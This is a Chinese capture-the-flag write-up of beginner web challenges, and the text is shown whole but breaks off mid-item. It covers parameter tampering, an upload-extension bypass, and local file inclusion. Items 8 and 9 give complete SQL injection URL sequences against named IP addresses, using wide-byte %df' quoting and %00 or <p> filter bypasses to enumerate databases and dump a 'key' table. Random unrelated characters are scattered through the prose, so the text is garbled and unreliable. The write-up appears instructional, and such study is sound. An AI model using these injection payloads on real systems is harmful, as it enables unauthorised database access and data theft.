1.web基礎(chǔ)$_GET

writeup：

輸入http://120.24.86.145:8002/get/?what=flag，得到flag

2.web基礎(chǔ)$_POST

writeup：

使用火狐瀏覽器插件hackbar中的 PostData汽煮，發(fā)送post數(shù)據(jù)硼补，得到flag

3.矛盾

writeup：

is_numeric—檢測變量是否為數(shù)字或數(shù)字字符串逛万，首先匹配第一個(gè)if需要輸入一個(gè)字符串橡伞，匹配第二個(gè)if需要滿足==1，輸入 1x66田藐。

4.web2

writeup：

審查元素荔烧，找到flag

5.文件上傳測試

writeup：

上傳.jpg圖片文件，使用burpsuite進(jìn)行攔截汽久，發(fā)送到repeater鹤竭，將.jpg更改為.php，上傳得到flag

6.計(jì)算題-隨機(jī)數(shù)字運(yùn)算驗(yàn)證碼

使用firebug查看源代碼景醇，發(fā)現(xiàn)文本框限制了輸入的長度為1臀稚，直接修改maxlength值，輸入答案即可得到flag

7.web3

writeup：

阻止此頁面創(chuàng)建更多對(duì)話框三痰，查看網(wǎng)頁源代碼

使用firebug控制臺(tái)吧寺，document.write("")進(jìn)行解碼輸出，得到flag

8.sql注入

查看網(wǎng)頁源代碼散劫，發(fā)現(xiàn)采用gb2312進(jìn)行編碼稚机，考慮寬字節(jié)注入，使用%df+%27

成功報(bào)錯(cuò)获搏，隨后進(jìn)行注入

（1）確定列數(shù)赖条，列數(shù)為2列

http://103.238.227.13:10083/?id=1%df' order by 2 %23? ? ? ? ? //正常

http://103.238.227.13:10083/?id=1%df' order by 3 %23? ? ? ? ? //報(bào)錯(cuò)

（2）爆數(shù)據(jù)庫名

http://103.238.227.13:10083/?id=-1%df' union select 1,database() %23

http://103.238.227.13:10083/?id=-1%df' union select 1,group_concat(schema_name) from information_schema.schemata %23

（3）爆破表名

http://103.238.227.13:10083/?id=1%df%27 union select 1,table_name from information_schema.tables %23

發(fā)現(xiàn)key表

（4）爆列名

http://103.238.227.13:10083/?id=1%df%27 union select 1,column_name from information_schema.columns %23

發(fā)現(xiàn)string 和key兩列。最后發(fā)現(xiàn)key既是列名又是表名會(huì)產(chǎn)生沖突常熙，用 ` 來包含住表名?`key` 表示表纬乍。

http://103.238.227.13:10083/?id=-1%df%27 union select 1,string from `key` where id=1 %23

得到flag

另外，也可以使用sql5.key替代`key`裸卫，實(shí)現(xiàn)同樣的效果仿贬，得到flag。

http://103.238.227.13:10083/?id=-1%df%27 union select 1,string from sql5.key where id=1%23

9.SQL注入1

輸入 and 1=1墓贿，發(fā)現(xiàn)and關(guān)鍵字被過濾了茧泪，經(jīng)過嘗試發(fā)現(xiàn)or退个，union，select等array數(shù)組中的都被過濾了调炬。

使用雙寫andand，anandd舱馅，等發(fā)現(xiàn)都被過濾了缰泡，從大牛的writeup中學(xué)習(xí)到了，重點(diǎn)關(guān)注這個(gè)XSS過濾函數(shù)代嗤，

strip_tags該函數(shù)嘗試返回給定的字符串$id去除空字符棘钞、HTML 和 PHP 標(biāo)記后的結(jié)果。

嘗試常用的空字符“%00”干毅，HTML標(biāo)簽“<p>”等宜猜，發(fā)現(xiàn)繞過成功。

http://103.238.227.13:10087/?id=1 a%00nd 1=1

http://103.238.227.13:10087/?id=-1 un<p>ion sel<p>ect 1,2%23

（1）爆列名

http://103.238.227.13:10087/?id=1 o%00rder by 2 %23

http://103.238.227.13:10087/?id=1 o<p>rder by 2 %23

http://103.238.227.13:10087/?id=1 o%00rder by 3 %23硝逢，返回結(jié)果為空姨拥，確定為2列

（2）爆數(shù)據(jù)庫名

http://103.238.227.13:10087/?id=-1 uni%00on s%00elect 1,database() %23

（3）爆字段值

http://103.238.227.13:10087/?id=-1 uni%00on s%00elect 1,hash fro%00m sql3.key %23，得到flag

10. 你必須讓他停下

打開頁面渠鸽，頁面中js自動(dòng)刷新叫乌，根據(jù)題目意思是，要讓界面停止刷新徽缚，所以我們可以使用burf1.7.26工具進(jìn)行頁面攔截憨奸，然后使用repeater中的go功能，來一次一次的瀏覽頁面凿试，若干次go之后排宰，在HTML標(biāo)簽中得到flag。

11.本地包含

方法1：直接輸入?hello=file("flag.php")那婉，通過file使其以數(shù)組形式返回然后利用var_dump輸出板甘，所以直接輸入

?hello=file("flag.php")